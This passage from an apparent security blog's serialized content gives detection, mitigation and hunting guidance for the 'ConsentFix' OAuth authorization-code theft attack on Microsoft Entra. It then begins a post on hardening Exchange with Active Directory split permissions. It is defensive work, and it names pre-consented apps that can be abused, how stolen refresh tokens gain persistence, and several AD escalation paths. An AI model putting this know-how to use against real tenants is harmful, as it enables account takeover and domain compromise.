The targeted application ID cannot be changed.",[41,18925,18927],{"id":18926},"reduce-the-noise","Reduce the noise",[12,18929,18930],{},"This knowledge already provided us with a good working detection, but there were benign positives in the mix as well. Modern developers use cloud resources that appear like local instances, but result in irregular login patterns in the logs.",[12,18932,18933],{},"The key difference is the time component. While the attack requires user interaction to copy and paste or drag and drop the URI, the GitHub Codespace use case we identified as the source of the benign positive alerts is completely automated and redeems the auth code within mere seconds.",[12,18935,18936],{},"So filtering out anything that does this authentication dance within a few seconds can most likely be removed as benign.",[12,18938,18939],{},"Another source of noise could be changing egress points for your internet traffic, especially in SD-WAN, ZTNA or Secure Web Gateway scenarios.",[41,18941,18943],{"id":18942},"affected-first-party-applications","Affected first-party applications",[12,18945,18946],{},"While the initial report shows \"Microsoft Azure CLI\" as the abused application there are a lot of different Microsoft first-party apps with pre-consent in every tenant that offer localhost as redirect. And not only those are a target. 
The attacker could also abuse reply test and dev URLs that are not publicly resolvable.",[12,18948,18949],{},"Here is a list of the most notable applications that also have high pre-consentet permissions on resources.",[1255,18951,18952,18955,18958,18961,18964],{},[1258,18953,18954],{},"Microsoft Azure CLI (04b07795-8ddb-461a-bbee-02f9e1bf7b46)",[1258,18956,18957],{},"Microsoft Azure PowerShell (1950a258-227b-4e31-a9cf-717495945fc2)",[1258,18959,18960],{},"Visual Studio (04f0c124-f2bc-4f59-8241-bf6df9866bbd)",[1258,18962,18963],{},"Visual Studio Code (aebc6443-996d-45c2-90f0-388ff96faa56)",[1258,18965,18966],{},"MS Teams PowerShell Cmdlets (12128f48-ec9e-42f0-b203-ea49fb6af367)",[12,18968,18969,18970,18975],{},"A full list of these apps are now included in ",[2630,18971,18974],{"href":18972,"rel":18973},"https://entrascopes.com/?authcodeFix=true",[3135],"EntraScopes.com"," by our colleague Fabian Bader.",[41,18977,18979],{"id":18978},"mitigations-and-protections","Mitigations and Protections",[186,18981,18983],{"id":18982},"limit-the-attack-surface-and-audience","Limit the attack surface and audience",[52,18985,18988,18991,18992,18994,18997,18998,19000,19003],{"className":18986},[18987],"option-block",[251,18989,18990],{},"Deployment effort:"," Low to High (depends on effort to identify legitimate users)",[531,18993],{},[251,18995,18996],{},"Mitigation:"," Medium (reduces the potential audience for the attack)",[531,18999],{},[251,19001,19002],{},"Scope:"," limited\n",[186,19005,19007],{"id":19006},"option-1-require-user-assignment","Option 1: Require User Assignment",[19009,19010,19012],"h4",{"id":19011},"pre-requisites","Pre-requisites:",[1255,19014,19015,19018,19021],{},[1258,19016,19017],{},"Add the service principal for affected first-party apps by using Microsoft Graph API or PowerShell",[1258,19019,19020],{},"Apply the user assignment requirement on the service principal object using Microsoft Graph API or PowerShell",[1258,19022,19023],{},"Establish a 
process to assign users upon request via Access Packages, PIM-for-Groups (for just-in-time access), or a combination of both.",[2126,19025,19026],{},"\n.code-block {\n  background-color: #f6f8fa;\n  padding: 0 16px 16px 16px;\n  border-radius: 6px;\n  font-family: Menlo, Consolas, Monaco, \"Courier New\", monospace;\n  font-size: 14px;\n  line-height: 1.5;\n  overflow-x: auto;\n  white-space: pre;\n  border: 1px solid #d0d7de;\n}\n",[56,19028,19030],{"className":19029},[524],[63,19031,19032],{},"\n# Example for Microsoft Graph PowerShell\nConnect-MgGraph -Identity\n$AppId = \"04b07795-8ddb-461a-bbee-02f9e1bf7b46\" # Microsoft Azure CLI\n$sp = Get-MgServicePrincipal -Filter \"appId eq '$AppId'\"\n# Create the service principal first if the first-party app is not present in the tenant yet\nif (-not $sp) { $sp = New-MgServicePrincipal -AppId $AppId }\n# Require an explicit user assignment before anyone can sign in to this app\nUpdate-MgServicePrincipal -ServicePrincipalId $sp.Id -AppRoleAssignmentRequired:$true\n",[19009,19034,19036],{"id":19035},"benefit","Benefit:",[1255,19038,19039,19042,19045,19048],{},[1258,19040,19041],{},"Enables management of user assignments through Access Packages or manual group membership to limit exposure to this attack technique.",[1258,19043,19044],{},"Option to provide just-in-time access combined with eligible group membership assignment, allowing temporary access to CLI tools and thereby further reducing the attack surface.",[1258,19046,19047],{},"Applied before evaluating Conditional Access policies.",[1258,19049,19050],{},"Limits the attack surface for other scenarios as well.",[19009,19052,19054],{"id":19053},"disadvantage","Disadvantage:",[1255,19056,19057,19060,19063],{},[1258,19058,19059],{},"Can only be scoped to specific users and not combined with other requirements like usage of specific devices",[1258,19061,19062],{},"All legitimate CLI tool users must be identified",[1258,19064,19065],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins.",[186,19067,19069],{"id":19068},"option-2-block-access-by-using-conditional-access-policies","Option 2: Block access by using Conditional Access 
Policies",[19009,19071,19012],{"id":19072},"pre-requisites-1",[1255,19074,19075,19078],{},[1258,19076,19077],{},"Create a Conditional Access policy to block access to CLI tools, excluding legitimate users, by targeting \"Microsoft Graph Command Line Tools\" and \"Windows Azure Service Management API\"",[1258,19079,19080],{},"Manage exclusions via group membership, either manually or through entitlement management (e.g., Access Packages).",[19009,19082,19036],{"id":19083},"benefit-1",[1255,19085,19086,19089],{},[1258,19087,19088],{},"Prevents token issuance for non-legitimate or non-privileged users.",[1258,19090,19091],{},"Allows granular scoping based on additional conditions such as device or network.",[19009,19093,19054],{"id":19094},"disadvantage-1",[1255,19096,19097,19100],{},[1258,19098,19099],{},"All legitimate CLI tool users must be identified and excluded.",[1258,19101,19102],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode.",[186,19104,19106],{"id":19105},"block-token-issuance-by-authorization-code-flow","Block token issuance by authorization code flow",[2126,19108,19109],{},"\n.option-block {\n  background-color: #f6f8fa;\n  padding: 16px;\n  margin-bottom:2rem;\n  border-radius: 6px;\n  overflow-x: auto;\n  border: 1px solid #d0d7de;\n}\n",[52,19111,19113,19116,19117,19119,19121,19122,19124,19121,19126,19128,19130],{"className":19112},[18987],[251,19114,19115],{},"Option:"," Require Token Protection",[531,19118],{},[251,19120,18990],{}," High",[531,19123],{},[251,19125,18996],{},[531,19127],{},[251,19129,19002],{}," Very limited\n",[19009,19132,19012],{"id":19133},"pre-requisites-2",[1255,19135,19136,19139,19142,19161],{},[1258,19137,19138],{},"Microsoft Entra ID P1 licenses",[1258,19140,19141],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows platform",[1258,19143,19144,19145,805,19150,4598,19155,19160],{},"Enable Web Account 
Manager (WAM) in ",[2630,19146,19149],{"href":19147,"rel":19148},"https://learn.microsoft.com/en-us/cli/azure/authenticate-azure-cli-interactively?view=azure-cli-latest#sign-in-with-web-account-manager-wam-on-windows",[3135],"Azure CLI",[2630,19151,19154],{"href":19152,"rel":19153},"https://learn.microsoft.com/en-us/powershell/azure/configure-global-settings?view=azps-15.1.0#web-account-manager-wam",[3135],"Azure PowerShell",[2630,19156,19159],{"href":19157,"rel":19158},"https://learn.microsoft.com/en-us/powershell/module/microsoft.graph.authentication/set-mggraphoption?view=graph-powershell-1.0#set-web-account-manager-support",[3135],"Microsoft Graph PowerShell"," (default in latest versions)",[1258,19162,19163,19164],{},"Configure Conditional Access targeting:\n",[1255,19165,19166,19180,19187],{},[1258,19167,19168,19169],{},"Cloud App targeting to the following apps:\n",[1255,19170,19171,19174,19177],{},[1258,19172,19173],{},"Office 365 Exchange Online",[1258,19175,19176],{},"Office 365 SharePoint Online",[1258,19178,19179],{},"Microsoft Teams Services",[1258,19181,19182,19183,19186],{},"Client apps under ",[4328,19184,19185],{},"Mobile apps and desktop clients"," to require Token Protection.",[1258,19188,19189,19190,19193,19194,19197],{},"Select ",[4328,19191,19192],{},"Windows"," as ",[4328,19195,19196],{},"device platform"," for targeting the policy",[19009,19199,19036],{"id":19200},"benefit-2",[12,19202,19203],{},"Microsoft Entra’s token protection requires proof‑of‑possession (PoP), which can only be enforced when the client communicates directly with a trusted token broker such as the Web Account Manager (WAM) on Windows. 
Because browsers cannot establish this secure channel, the authorization code flow initiated in a browser is blocked under token protection policies.",[12,19205,19206],{},"When the policy enforces token protection that requires broker‑managed PoP, the authorization code returned to a browser cannot be redeemed because the browser cannot produce the required broker‑signed proof during the code-to-token exchange.",[12,19208,19209],{},"In this case, attacks with AuthCodeFix will be fully mitigated as long as the application can be protected by Token Protection.",[12,19211,19212],{},"As shown in the screenshot below, Token Protection successfully mitigates the redemption of the authorization code flow initiated by the victim through a phishing action.",[12,19214,19215],{},[2772,19216],{"alt":19217,"src":19218},"Token Protection successfully mitigates the redemption of the authorization code flow","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-07.png",[19009,19220,19054],{"id":19221},"disadvantage-2",[1255,19223,19224,19254,19257,19260],{},[1258,19225,19226,19227],{},"Only the following resources are officially supported:\n",[1255,19228,19229,19231,19233],{},[1258,19230,19173],{},[1258,19232,19176],{},[1258,19234,19179,19235,19237,19239,19240,4598,19243,19247,19248,19253],{},[531,19236],{},[531,19238],{},"\nThe Microsoft Graph API is indirectly covered by the previously mentioned resources and Microsoft Graph PowerShell is listed as a supported client. We were able to verify in our testing that the attack for this scenario will be mitigated. \"Windows Azure Service Management API\" is not listed as a supported resource. Both CLI clients (",[2630,19241,19149],{"href":19147,"rel":19242},[3135],[2630,19244,19154],{"href":19245,"rel":19246},"https://learn.microsoft.com/en-us/powershell/azure/authenticate-interactive?view=azps-15.1.0#benefits-of-wam",[3135],") support WAM, which is a client-side requirement to use Token Protection. 
Microsoft has announced ",[2630,19249,19252],{"href":19250,"rel":19251},"https://techcommunity.microsoft.com/blog/microsoft-entra-blog/how-to-break-the-token-theft-cyber-attack-chain/4062700",[3135],"in a blog post"," that it will extend token protection capabilities to Azure management scenarios.",[1258,19255,19256],{},"Some bugs in Microsoft Graph PowerShell force you to temporarily disable WAM integration",[1258,19258,19259],{},"Side effects and organizational impact must be carefully assessed by reviewing previous sign-ins and evaluating the policy in report-only mode. The cloud app targeting will also affect productivity access to Microsoft 365.",[1258,19261,19262],{},"Limited scope due to availability on supported platforms and Entra ID–integrated devices.",[186,19264,19266],{"id":19265},"block-further-token-issuance-by-compliant-network-check-or-trusted-network","Block further token issuance by compliant network check or trusted network",[52,19268,19270,19272,19273,19275,19272,19277,19279,19281],{"className":19269},[18987],[251,19271,18990],{}," Medium",[531,19274],{},[251,19276,18996],{},[531,19278],{},[251,19280,19002],{}," Broad\n",[186,19283,19285],{"id":19284},"option-block-access-outside-of-compliant-network-with-global-secure-access","Option: Block access outside of Compliant network with Global Secure Access",[19009,19287,19289],{"id":19288},"pre-requisite","Pre-requisite:",[1255,19291,19292,19295,19298,19301],{},[1258,19293,19294],{},"Entra ID P1 license",[1258,19296,19297],{},"Entra ID Registered Devices, Hybrid or Entra ID-joined devices on Windows, macOS, Android and iOS platform",[1258,19299,19300],{},"Global Secure Access Client on all affected clients and enabled Entra Internet Access for M365 Traffic Profile",[1258,19302,19303],{},"Conditional Access Policy to enforce the compliant network check should be applied to all cloud apps",[19009,19305,19036],{"id":19306},"benefit-3",[12,19308,19309],{},"Block additional token issuance by enforcing a 
trusted network check. This mitigation ensures attackers cannot obtain new tokens using the refresh token from the authorization code flow. However, it does not prevent the initial redemption of the authorization code or the issuance of the first access token, which remains valid outside the compliant network because it was originally requested by the victim.",[2109,19311,19312],{},[12,19313,19314],{},"Enforcing GSA with the Compliant Network condition also blocks other Token Replay scenarios and adds additional logs which can be very useful for detections and hunting.",[19009,19316,19054],{"id":19317},"disadvantage-3",[1255,19319,19320,19323,19326],{},[1258,19321,19322],{},"Only applicable for users and devices with deployed Global Secure Access client",[1258,19324,19325],{},"Limited scope due to availability on Entra ID–integrated devices",[1258,19327,19328],{},"Enforcing Compliant Networks via CA will need some exclusions, such as Intune, to avoid chicken-and-egg problems. Detailed testing is needed before rollout",[41,19330,19332],{"id":19331},"hunting-queries","Hunting queries",[12,19334,19335,19336,19339],{},"Once all the prerequisites for token theft mitigations are met - such as deploying the GSA client (including ingestion of ",[63,19337,19338],{},"NetworkAccessTraffic"," logs) and taking advantage of WAM authentication - we gain additional options for threat hunting and verification.",[186,19341,19343],{"id":19342},"leveraging-gsa-logs-and-wam-authentication-for-hunting-or-verify-confidence-on-detection-results","Leveraging GSA Logs and WAM Authentication for hunting or verify confidence on detection results",[12,19345,19346,19347,19349],{},"This hunting query leverages ",[63,19348,19338],{}," logs from Global Secure Access (GSA), which include the initiating process for communication with the Microsoft Entra token endpoint. 
This helps determine whether a token request originated directly from a browser and also whether any additional token requests were made outside the GSA network.",[2109,19351,19352],{},[12,19353,19354],{},"This query works and delivers reliable results only when the prerequisites are met; otherwise, it leads to a high false-positive rate.",[12,19356,19357,19360,19361,19364,19365,19368],{},[251,19358,19359],{},"Why this matters:"," When signing in via CLI or PowerShell modules using Web Account Manager (WAM) on Windows Devices, the flow does not involve a browser-based authorization code. This sign-in behavior is the default in the latest version. Therefore, if the initiating process is a browser executable (e.g., ",[63,19362,19363],{},"msedge.exe","), this is a strong indicator of suspicious activity. On macOS, the process is initiated by the Company Portal app (",[63,19366,19367],{},"com.microsoft.CompanyPortalMac.ssoextension",") when using Platform SSO.",[12,19370,19371,19374],{},[251,19372,19373],{},"Token Binding and PoP:"," WAM authentication typically binds tokens to the device by enforcing Proof-of-Possession (PoP). 
Attackers cannot obtain further bound tokens without PoP, so an unbound refresh token is another strong indicator.",[12,19376,19377,19380],{},[251,19378,19379],{},"Limitations:"," All the mentioned signals are only available when the accessing device is registered with or joined to Microsoft Entra ID.",[12,19382,19383,19386],{},[251,19384,19385],{},"Confidence Score Logic:"," The query combines multiple signals to calculate a confidence score:",[1255,19388,19389,19392,19395],{},[1258,19390,19391],{},"Presence of a browser process initiating token requests.",[1258,19393,19394],{},"Detection of a downgrade to unbound tokens.",[1258,19396,19397],{},"Network provider changes (including Compliant to non-compliant) between sign-ins.",[12,19399,19400],{},"These signals can be used in the query to hunt for activity or to derive a confidence score in the event of an incident based on the previous detection.",[12,19402,19403],{},[2772,19404],{"alt":19405,"src":19406},"Signals for the hunting query","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-08.png",[12,19408,19409],{},"The following scoring will be shown depending on the conditions:",[12,19411,19412,19415,19416,19418,19419,19421,19423,19426,19427,19429,19431,19434],{},[251,19413,19414],{},"A very high confidence score"," is displayed when ",[63,19417,19338],{}," logs indicate a familiar browser process, rather than the broker, initiating a token request, and a downgrade to an unbound token has been detected.",[531,19420],{},[531,19422],{},[251,19424,19425],{},"A high confidence score"," is shown when the sign-in occurs from a different Network Provider (ASN) and a non-compliant network involving unbound tokens.",[531,19428],{},[531,19430],{},[251,19432,19433],{},"A medium confidence score"," is shown when only a change in Network Provider and compliant network is identified, along with a change in the token type used.",[12,19436,19437,19438,1014],{},"You’ll find the latest version of the hunting query on 
",[2630,19439,19442],{"href":19440,"rel":19441},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-Authentication/ConsentFix-HuntingConfidenceOnTokenAndNetworkSignals.kusto",[3135],"GitHub",[186,19444,19446],{"id":19445},"hunting-for-activities-by-issued-tokens","Hunting for activities by issued tokens",[12,19448,19449,19450,19455,19456,19459,19460,19462,19463,19466],{},"You should consider expanding your investigation beyond sign-in events to include activities performed using tokens issued by the attacker. Our colleague Thomas Naunheim has ",[2630,19451,19454],{"href":19452,"rel":19453},"https://github.com/Cloud-Architekt/AzureSentinel/blob/main/Hunting%20Queries/EID-TokenHunting/MicrosoftCloudActivity.func",[3135],"published a KQL function"," called ",[63,19457,19458],{},"MicrosoftCloudActivity",", which can assist in this extended hunting process. Additionally, the affected ",[63,19461,18889],{}," can be correlated with suspicious ",[63,19464,19465],{},"UniqueId"," values identified during previous hunts for deeper analysis.",[12,19468,19469],{},[2772,19470],{"alt":19471,"src":19472},"KQL function","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-09.png",[12,19474,19475],{},"In this example, the attacker leveraged the refresh token obtained during the attack to issue an access token for the Microsoft Graph API. This token was then used to maintain persistent access and lateral movement by adding a client secret to an application owned by the victim. 
The query provides details about the Graph API operation, including the token protection status and whether the operation occurred outside the Global Secure Access network.",[12,19477,19478],{},[2772,19479],{"alt":19480,"src":19481},"Graph API operation screenshot","https://res.cloudinary.com/c4a8/image/upload/blog/pics/consentfix-img-10.png",[41,19483,19485],{"id":19484},"further-reading","Further Reading",[1255,19487,19488,19495,19502,19509],{},[1258,19489,19490],{},[2630,19491,19494],{"href":19492,"rel":19493},"https://pushsecurity.com/blog/consentfix",[3135],"ConsentFix: Analysing a browser-native ClickFix-style attack that hijacks OAuth consent grants - PushSecurity",[1258,19496,19497],{},[2630,19498,19501],{"href":19499,"rel":19500},"https://youtu.be/AAiiIY-Soak",[3135],"Hacking Endpoint to Identity (Microsoft 365): \"ConsentFix\" - YouTube",[1258,19503,19504],{},[2630,19505,19508],{"href":19506,"rel":19507},"https://learn.microsoft.com/en-us/entra/identity-platform/v2-oauth2-auth-code-flow",[3135],"Microsoft identity platform and OAuth 2.0 authorization code flow",[1258,19510,19511],{},[2630,19512,19515],{"href":19513,"rel":19514},"https://entrascopes.com/?appId=04b07795-8ddb-461a-bbee-02f9e1bf7b46",[3135],"Microsoft Azure CLI on 
entrascopes.com",{"title":65,"searchDepth":111,"depth":111,"links":19517},[19518,19521,19522,19523,19531,19535],{"id":18847,"depth":111,"text":18848,"children":19519},[19520],{"id":18873,"depth":329,"text":18874},{"id":18926,"depth":111,"text":18927},{"id":18942,"depth":111,"text":18943},{"id":18978,"depth":111,"text":18979,"children":19524},[19525,19526,19527,19528,19529,19530],{"id":18982,"depth":329,"text":18983},{"id":19006,"depth":329,"text":19007},{"id":19068,"depth":329,"text":19069},{"id":19105,"depth":329,"text":19106},{"id":19265,"depth":329,"text":19266},{"id":19284,"depth":329,"text":19285},{"id":19331,"depth":111,"text":19332,"children":19532},[19533,19534],{"id":19342,"depth":329,"text":19343},{"id":19445,"depth":329,"text":19446},{"id":19484,"depth":111,"text":19485},{"lang":2170,"seoTitle":19537,"titleClass":2172,"date":19538,"categories":19539,"blogtitlepic":19540,"socialimg":19541,"customExcerpt":19542,"keywords":19543,"hreflang":19544,"scripts":19549,"asideNav":19550,"maxContent":2180,"published":2180},"ConsentFix: How a New OAuth Attack Bypasses Microsoft Entra Conditional Access","2025-12-31",[2175],"head-consentfix","/heads/head-consentfix.jpg","Just before year's end, ConsentFix emerges: a clever OAuth-based attack that abuses legitimate authentication flows to steal the authorization code, effectively handing attackers the keys to Microsoft Entra. 
We break down why this works despite Conditional Access, which signals it leaves behind in the logs, and how defenders can detect and stop it before real damage is done.","ConsentFix attack, OAuth authorization code theft, Microsoft Entra OAuth attack, Azure CLI token abuse, Entra ID Conditional Access bypass, authorization code phishing, token replay attack Azure, Proof of Possession tokens, WAM authentication security, Azure sign-in log analysis, detect OAuth attacks Entra, Azure identity threat hunting, Global Secure Access token protection, Microsoft Entra security detection",[19545,19547],{"lang":2260,"href":19546},"/de/posts/2025-12-31-vulnerability-consentfix",{"lang":2170,"href":19548},"/es/posts/2025-12-31-vulnerability-consentfix",{"slick":2180,"form":2180},{"menuItems":19551},[19552,19554,19556,19558,19560,19562],{"href":19553,"text":18848},"#detection-artifacts",{"href":19555,"text":18927},"#reduce-the-noise",{"href":19557,"text":18943},"#affected-first-party-applications",{"href":19559,"text":18979},"#mitigations-and-protections",{"href":19561,"text":19332},"#hunting-queries",{"href":19563,"text":19485},"#further-reading","/posts/2025-12-31-vulnerability-consentfix",{"title":18752,"description":18758},"posts/2025-12-31-vulnerability-consentfix",[19568,19569,3305],"OAuth 2.0","Microsoft Entra ID","FeRkYBxL6Cs3rWE3W6zzA_RRRyTZcOSeBsfb2kNOarM",{"id":19572,"title":19573,"author":19574,"body":19576,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2180,"layout":2168,"meta":20110,"moment":20112,"navigation":2180,"path":20135,"seo":20136,"stem":20137,"tags":2165,"webcast":2167,"__hash__":20138},"content_es/posts/2026-01-27-exchange-active-directory.md","​​​Exchange AD Split Permissions without regrets​",[19575],"​Thorsten 
Kunzi​",{"type":9,"value":19577,"toc":20093},[19578,19582,19585,19591,19595,19617,19620,19624,19630,19644,19650,19653,19657,19693,19712,19716,19722,19730,19734,19750,19754,19760,19764,19774,19779,19784,19803,19807,19832,19836,19856,19864,19878,19892,19952,19956,19980,19997,20009,20022,20029,20033,20043,20054,20066,20070,20073,20076,20090],[186,19579,19581],{"id":19580},"tldr-what-if-we-remove-the-downsides","TLDR: what if we remove the downsides?",[12,19583,19584],{},"I found a way to re-grant the AD and RBAC permissions where the Exchange user, groups, contacts, etc. reside. This way there is no adoption needed for admins or identity management systems, which in my experience was the blocker for most companies to implement it. And we still get the security benefit against lateral movement and domain compromise.",[12,19586,19587],{},[2772,19588],{"alt":19589,"src":19590},"Active Directory","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_1.png",[186,19592,19594],{"id":19593},"its-achieved-in-three-steps","It’s achieved in three steps:",[6086,19596,19597,19607,19612],{},[1258,19598,19599,19600,19605],{},"Implement ",[2630,19601,19604],{"href":19602,"rel":19603},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions#switch-to-active-directory-split-permissions",[3135],"AD split permission model",[531,19606],{},[1258,19608,19609,19610],{},"Grant Exchange servers the lost AD permissions, but only on the relevant OUs",[531,19611],{},[1258,19613,19614,19615],{},"Grant Exchange RBAC to re-enable missing PowerShell cmdlets",[531,19616],{},[12,19618,19619],{},"All via Microsoft’s guidance, AD ACLs or Exchange RBAC assignments.",[186,19621,19623],{"id":19622},"why-do-we-care-now","Why do we care (now)?",[12,19625,19626,19627,19629],{},"It has been largely overlooked or ignored since it was introduced with Exchange 2010 SP1. 
But the default shared permissions model represents a big security risk to Active Directory takeover. Combined with Exchange being notorious for remote exploits these last few years, it’s time to act!",[531,19628],{},"\nThe problem originates from privileges granted to the root of a domain that get inherited throughout the domain.",[1255,19631,19632,19635,19638,19641],{},[1258,19633,19634],{},"modify permissions on users and groups (effectively full access)",[1258,19636,19637],{},"modify group members",[1258,19639,19640],{},"reset password on users",[1258,19642,19643],{},"create/delete users and groups",[12,19645,19646],{},[2772,19647],{"alt":19648,"src":19649},"Permissions","https://res.cloudinary.com/c4a8/image/upload/v1770991330/blog/pics/Blog_-_Exchange_AD_Split_Permissions_-_2.png",[12,19651,19652],{},"Only certain high privileged Tier0 users and groups are protected by the AdminSDHolder process (attribute admincount=1) and in many environments there will be unprotected users or groups that could allow compromise of the domain and/or forest or at least cause serious impact.",[186,19654,19656],{"id":19655},"prominent-examples","Prominent examples:",[1255,19658,19659,19662,19682],{},[1258,19660,19661],{},"Entra Connect Sync account when using PWHashSync",[1258,19663,19664,19665],{},"Default groups\n",[1255,19666,19667,19670,19679],{},[1258,19668,19669],{},"Allowed RODC Password Replication Group together with EntraConnect account (If a real Windows RODC exists)",[1258,19671,19672,19673,19678],{},"Also see ",[2630,19674,19677],{"href":19675,"rel":19676},"https://specterops.io/blog/2025/06/25/untrustworthy-trust-builders-account-operators-replicating-trust-attack-aorta/",[3135],"Untrustworthy Trust Builders: Account Operators Replicating Trust Attack (AORTA) - SpecterOps"," showing more paths (Account Operators group is a similar threat)",[1258,19680,19681],{},"Emptying Protected Users to create attack vectors by removing 
protections",[1258,19683,19684,19685],{},"Unprotected custom groups or admin/service accounts\n",[1255,19686,19687,19690],{},[1258,19688,19689],{},"Write permission on GPOs (applying to domain controller)",[1258,19691,19692],{},"Managing access to AD backups, backup server, PKI templates, hypervisor, ...",[12,19694,19695,19696,19698,19699,19704,19706,19707],{},"It is very hard to retroactively contain all these current and future potential pathways. For the _ADM custom OU you could disable ACL inheritance, but most default objects may not be moved from the default Builtin OU or Users container and remain vulnerable.",[531,19697],{},"\nIt is much better to remove the powerful permissions from the root, which is done by implementing the Active Directory split permissions model. ",[2630,19700,19703],{"href":19701,"rel":19702},"https://learn.microsoft.com/en-us/exchange/permissions/split-permissions/configure-exchange-for-split-permissions",[3135],"Configure Exchange Server for split permissions | Microsoft Learn",[531,19705],{},"\nAnd Microsoft agrees “…encouraged to implement Active Directory split permissions” ",[2630,19708,19711],{"href":19709,"rel":19710},"https://techcommunity.microsoft.com/blog/coreinfrastructureandsecurityblog/active-directory-hardening-series---part-7-%E2%80%93-implementing-least-privilege/4366626",[3135],"Active Directory Hardening Series - Part 7 – Implementing Least Privilege | Microsoft Community Hub",[41,19713,19715],{"id":19714},"but-why-is-no-one-doing-it","But why is no one doing it?",[12,19717,19718,19719,19721],{},"As split permissions weren’t available until Exchange 2010 SP1 everyone had accepted it by then and it seems that security teams did not manage to push successfully once it existed.",[531,19720],{},"\nAnd it would have forced changes to admin and IDM processes, like creating users or distribution lists in AD first and only afterwards using Exchange to “mail enable” them.",[12,19723,19724,19725,19727],{},"No longer 
available or working cmdlets:",[531,19726],{},[63,19728,19729],{},"Add-DistributionGroupMember, New-DistributionGroup, New-Mailbox, New-MailContact, New-MailUser, New-RemoteMailbox, Remove-DistributionGroup, Remove-DistributionGroupMember, Remove-Mailbox, Remove-MailContact, Remove-MailUser, Remove-RemoteMailbox, Update-DistributionGroupMember, Add-ADPermission, Remove-ADPermission ",[186,19731,19733],{"id":19732},"adoption-examples","Adoption examples:",[1255,19735,19736,19747],{},[1258,19737,19738,19739],{},"New-Mailbox (where Exchange writes to AD) would be:\n",[1255,19740,19741,19744],{},[1258,19742,19743],{},"New-ADUser (where adm.jdoe writes to AD)",[1258,19745,19746],{},"Enable-Mailbox",[1258,19748,19749],{},"Add-ADPermission for SendAs rights would have to be done via AD users and computers in the security tab and often requiring additional AD permissions for standard admins.",[41,19751,19753],{"id":19752},"show-me-this-no-regrets-option","Show me this no-regrets option!",[12,19755,19756,19759],{},[251,19757,19758],{},"Disclaimer",": Please fully read and understand the following links and articles, perform in a test environment first, make sure AD backups are current and recovery practices are established!",[186,19761,19763],{"id":19762},"audit-current-usage","Audit current usage",[12,19765,19766,19769,19771],{},[251,19767,19768],{},"You should first check which of the affected cmdlets are in use on which OUs.",[531,19770],{},[63,19772,19773],{},"$CsvPath =\"C:\\temp\\SplitPermissionAdminAuditLog.csv\"",[12,19775,19776],{},[63,19777,19778],{},"$Cmdlets = 
\"Add-ADPermission\",\"Remove-ADPermission\",\"New-DistributionGroup\",\"Remove-DistributionGroup\",\"Add-DistributionGroupMember\",\"Update-DistributionGroupMember\",\"Remove-DistributionGroupMember\",\"New-Mailbox\",\"Remove-Mailbox\",\"New-RemoteMailbox\",\"Remove-RemoteMailbox\",\"New-MailUser\",\"Remove-MailUser\",\"New-MailContact\",\"Remove-MailContact\"",[12,19780,19781],{},[63,19782,19783],{},"Search-AdminAuditLog -ResultSize 99000 -Cmdlets $Cmdlets| select RunDate,Caller,ObjectModified,CmdletName,@{Name='CmdletParameters';Expression={[string]::join(\",\", ($_.CmdletParameters))}},succeeded,error | Export-Csv -Path $CsvPath -Delimiter \";\" -Encoding Unicode -NoTypeInformation",[12,19785,19786,19789,19791,19794,19797,19800],{},[251,19787,19788],{},"Quick Analysis of caller and cmdlets:",[531,19790],{},[63,19792,19793],{},"$CSVs=Import-Csv -Path $CsvPath -Delimiter \";\"",[63,19795,19796],{},"$CSVs|group Caller",[63,19798,19799],{},"$CSVs|group CmdletName",[63,19801,19802],{},"Analyze the CSV for where AD permissions will be needed. 
Potentially optimize by moving all Exchange relevant groups into dedicated OUs.",[186,19804,19806],{"id":19805},"enable-split-permissions-model","Enable split permissions model",[12,19808,19809,19816,19818,19819,19821,19824,19826,540,19829],{},[251,19810,19811,19812,19815],{},"Follow instructions of “Switch to Active Directory split permissions” in ",[2630,19813,19703],{"href":19602,"rel":19814},[3135]," (NOT RBAC split permissions)",[531,19817],{},"\nIn essence it will remove the dangerous permissions of “Exchange Windows Permissions” group and also remove Exchange as group member.",[531,19820],{},[63,19822,19823],{},"Setup.exe /IAcceptExchangeServerLicenseTerms_DiagnosticDataOFF /PrepareAD /ActiveDirectorySplitPermissions:true",[531,19825],{},[251,19827,19828],{},"To revert back just use:",[63,19830,19831],{},"/ActiveDirectorySplitPermissions:false",[186,19833,19835],{"id":19834},"grant-ad-permissions","Grant AD Permissions",[12,19837,19838,19841,19843,19844,19846,19849,19851,19853],{},[251,19839,19840],{},"Create a custom AD group and make Exchange server members.",[531,19842],{},"\nadjust OU Path first!",[531,19845],{},[63,19847,19848],{},"New-ADGroup -Name \"AD_Custom Exchange Split permissions replacement\" -GroupCategory Security -GroupScope DomainLocal -Path \"OU=Rights,OU=Groups,OU=T1,OU=_ADM,$((Get-ADDomain).DistinguishedName)\" -Description \"replaces the permissions lost by split permissions on relevant OUs\"",[531,19850],{},[531,19852],{},[63,19854,19855],{},"Add-ADGroupMember \"AD_Custom Exchange Split permissions replacement\" -Members \"Exchange Trusted Subsystem\"",[12,19857,19858,19861,19863],{},[251,19859,19860],{},"reboot Exchange servers for permissions via group to work",[531,19862],{},"\nI’ve created a script to make delegating the AD permissions easy per use case.",[2109,19865,19866],{},[12,19867,19868,19873,19874,19877],{},[251,19869,19870],{},[4328,19871,19872],{},"INFO:"," Without these permissions the Exchange server would receive the 
